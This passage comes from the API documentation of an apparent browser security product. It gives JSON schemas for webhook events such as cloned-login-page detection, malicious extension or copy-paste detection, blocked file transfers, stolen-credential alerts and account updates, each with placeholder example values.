blocking"},"new":{"$ref":"#/components/schemas/ClipboardBlockingEvent","description":"Clipboard blocking event details."}}},"id":"schema_743"},"schema_744":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["CONTROL"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"john@company.com visited https://evil.com/okta.php which is a clone of a Okta login page"},"object":{"type":"string","enum":["CLONED_LOGIN_PAGE_DETECTED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Cloned login page detected"},"new":{"$ref":"#/components/schemas/ClonedLoginPageDetectedEvent","description":"Cloned login page detected event details."}}},"id":"schema_744"},"schema_745":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["CONTROL"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com triggered a detection for the \"Torrent website visit\" custom detection."},"object":{"type":"string","enum":["CUSTOM_DETECTION"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Custom detection"},"new":{"$ref":"#/components/schemas/CustomDetectionDetectedEvent","description":"Custom detection event details."}}},"id":"schema_745"},"schema_746":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. Use this as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["CONTROL"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"employee@example.com was blocked from casino.example.com"},"object":{"type":"string","enum":["DOMAIN_CATEGORY_BLOCKING"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Domain category blocking"},"new":{"$ref":"#/components/schemas/DomainCategoryBlockingEvent","description":"Domain category blocking event details."}}},"id":"schema_746"},"schema_747":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["CONTROL"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"employee@example.com downloaded file.exe from https://phishing-site.com/downloads"},"object":{"type":"string","enum":["FILE_DOWNLOAD_BLOCKING"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"File download blocking"},"new":{"$ref":"#/components/schemas/FileDownloadBlocking","description":"File download blocking event details."}}},"id":"schema_747"},"schema_748":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["CONTROL"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"employee@example.com was blocked from uploading test.exe on https://chatgpt.com"},"object":{"type":"string","enum":["FILE_UPLOAD_BLOCKING"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"File upload blocking"},"new":{"$ref":"#/components/schemas/FileUploadBlocking","description":"File upload blocking event details."}}},"id":"schema_748"},"schema_749":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["CONTROL"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com attempted to install and use malicious extension dljjddkmmcminffjbcmeccgfbjlhmhlm, but was blocked."},"object":{"type":"string","enum":["MALICIOUS_BROWSER_EXTENSION_DETECTED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Malicious browser extension detected"},"new":{"$ref":"#/components/schemas/MaliciousBrowserExtensionDetectedEvent","description":"Malicious browser extension detected event details."}}},"id":"schema_749"},"schema_750":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["CONTROL"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com visited https://evil.com which copied malicious content onto their clipboard"},"object":{"type":"string","enum":["MALICIOUS_COPY_PASTE_DETECTED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Malicious copy and paste detected"},"new":{"$ref":"#/components/schemas/MaliciousCopyPasteDetectedEvent","description":"Malicious copy and paste detected event details."}}},"id":"schema_750"},"schema_751":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["CONTROL"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"john@company.com was requested to enable MFA on GitHub"},"object":{"type":"string","enum":["MFA_ENFORCEMENT"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"MFA enforcement"},"new":{"$ref":"#/components/schemas/MfaEnforcementEvent","description":"MFA enforcement event details."}}},"id":"schema_751"},"schema_752":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["PASSWORD_LOGGING_PREVENTION"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com entered a password into a non password field on Google Workspace"},"object":{"type":"string","enum":["PASSWORD_LOGGING_PREVENTION"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Password logging prevention"},"new":{"$ref":"#/components/schemas/PasswordLoggingPreventionEvent","description":"Password logging prevention event details."}}},"id":"schema_752"},"schema_753":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["CONTROL"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com visited https://phishing.com"},"object":{"type":"string","enum":["PHISHING_TOOL_DETECTED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Phishing tool detected"},"new":{"$ref":"#/components/schemas/PhishingToolDetectedEvent","description":"Phishing tool detected event details."}}},"id":"schema_753"},"schema_754":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["CONTROL"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com entered their Microsoft 365 password into a different URL, but was blocked"},"object":{"type":"string","enum":["PROTECTED_PASSWORD_ENTERED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Protected password entered"},"new":{"$ref":"#/components/schemas/ProtectedPasswordEnteredEvent","description":"Protected password entered event details."}}},"id":"schema_754"},"schema_755":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["CONTROL"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"Stolen credentials detected on user@example.com's Google Workspace account"},"object":{"type":"string","enum":["STOLEN_CREDENTIALS_DETECTED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Stolen credentials detected"},"new":{"$ref":"#/components/schemas/StolenCredentialsEvent","description":"Stolen credentials event details."}}},"id":"schema_755"},"schema_756":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["CONTROL"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"john@company.com was requested to use a strong password on GitHub"},"object":{"type":"string","enum":["STRONG_PASSWORD_ENFORCEMENT"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Strong password enforcement"},"new":{"$ref":"#/components/schemas/StrongPasswordEnforcementEvent","description":"Strong password enforcement event details."}}},"id":"schema_756"},"schema_757":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["CONTROL"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com ignored warning page"},"object":{"type":"string","enum":["SSO_PASSWORD_USED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"SSO password used"},"new":{"$ref":"#/components/schemas/SsoPasswordUsedEvent","description":"SSO password used event details."}}},"id":"schema_757"},"schema_758":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["DETECTION"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com triggered a new blocked URL detection"},"type":{"type":"string","enum":["CREATE","UPDATE","DELETE"],"description":"The type of event that occurred."},"object":{"type":"string","description":"The object that was created.","example":"BLOCKED_URL"},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Blocked URL"},"new":{"$ref":"#/components/schemas/DetectionEvent","description":"The new state of the event details."},"old":{"$ref":"#/components/schemas/DetectionEvent","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The previous state of the event details. This is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" when the event type is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"CREATE"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]}]}}},"id":"schema_758"},"schema_759":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["DETECTION"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com triggered a new custom detection"},"type":{"type":"string","enum":["CREATE","UPDATE","DELETE"],"description":"The type of event that occurred."},"object":{"type":"string","description":"The object that was created.","example":"CUSTOM"},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Custom detection"},"new":{"$ref":"#/components/schemas/DetectionEvent","description":"The new state of the event details."},"old":{"$ref":"#/components/schemas/DetectionEvent","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The previous state of the event details. This is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" when the event type is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"CREATE"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]}]}}},"id":"schema_759"},"schema_760":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["DETECTION"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com triggered a new malicious browser extension detection"},"type":{"type":"string","enum":["CREATE","UPDATE","DELETE"],"description":"The type of event that occurred."},"object":{"type":"string","description":"The object that was created.","example":"MALICIOUS_BROWSER_EXTENSION"},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Malicious browser extension"},"new":{"$ref":"#/components/schemas/DetectionEvent","description":"The new state of the event details."},"old":{"$ref":"#/components/schemas/DetectionEvent","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The previous state of the event details. This is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" when the event type is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"CREATE"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]}]}}},"id":"schema_760"},"schema_761":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["DETECTION"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com triggered a new malware delivery detection"},"type":{"type":"string","enum":["CREATE","UPDATE","DELETE"],"description":"The type of event that occurred."},"object":{"type":"string","description":"The object that was created.","example":"MALWARE_DELIVERY"},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Malware delivery"},"new":{"$ref":"#/components/schemas/DetectionEvent","description":"The new state of the event details."},"old":{"$ref":"#/components/schemas/DetectionEvent","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The previous state of the event details. This is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" when the event type is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"CREATE"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]}]}}},"id":"schema_761"},"schema_762":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["DETECTION"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com triggered a new phishing attack detection"},"type":{"type":"string","enum":["CREATE","UPDATE","DELETE"],"description":"The type of event that occurred."},"object":{"type":"string","enum":["PHISHING","BLOCKED_URL","STOLEN_CREDENTIALS"],"description":"The object that was created.","example":"PHISHING"},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Phishing attack"},"new":{"$ref":"#/components/schemas/DetectionEvent","description":"The new state of the event details."},"old":{"$ref":"#/components/schemas/DetectionEvent","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The previous state of the event details. This is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" when the event type is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"CREATE"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]}]}}},"id":"schema_762"},"schema_763":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["DETECTION"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com triggered a new stolen credentials detection"},"type":{"type":"string","enum":["CREATE","UPDATE","DELETE"],"description":"The type of event that occurred."},"object":{"type":"string","description":"The object that was created.","example":"STOLEN_CREDENTIALS"},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Stolen credentials"},"new":{"$ref":"#/components/schemas/DetectionEvent","description":"The new state of the event details."},"old":{"$ref":"#/components/schemas/DetectionEvent","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The previous state of the event details. This is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" when the event type is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"CREATE"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]}]}}},"id":"schema_763"},"schema_764":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["ENTITY"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"employee@example.com on Google Workspace updated"},"type":{"type":"string","enum":["CREATE","UPDATE","DELETE"],"description":"The type of event that occurred."},"object":{"type":"string","enum":["ACCOUNT"],"description":"The object that was created, updated or deleted."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Account"},"new":{"$ref":"#/components/schemas/AccountEvent","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The new state of the object. This is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" when the event type is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"DELETE"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]}]},"old":{"$ref":"#/components/schemas/AccountEvent","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The previous state of the object. This is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" when the event type is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"CREATE"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]}]}}},"id":"schema_764"},"schema_765":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"type":{"type":"string","enum":["CREATE","UPDATE","DELETE"],"description":"The type of event that occurred."},"category":{"type":"string","enum":["ENTITY"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com updated on other app (c478966c-f927-411c-b919-179832d3d50c)"},"object":{"type":"string","enum":["ACCOUNT_OTHER"],"description":"The object that was created, updated or deleted."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Account (Other)"},"new":{"$ref":"#/components/schemas/AccountOther","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The new state of the object. This is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" when the event type is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"DELETE"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]}]},"old":{"$ref":"#/components/schemas/AccountOther","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"The previous state of the object. This is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"null"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" when the event type is "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"CREATE"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"."},"children":[]}]}]}]}}},"id":"schema_765"},"schema_766":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the 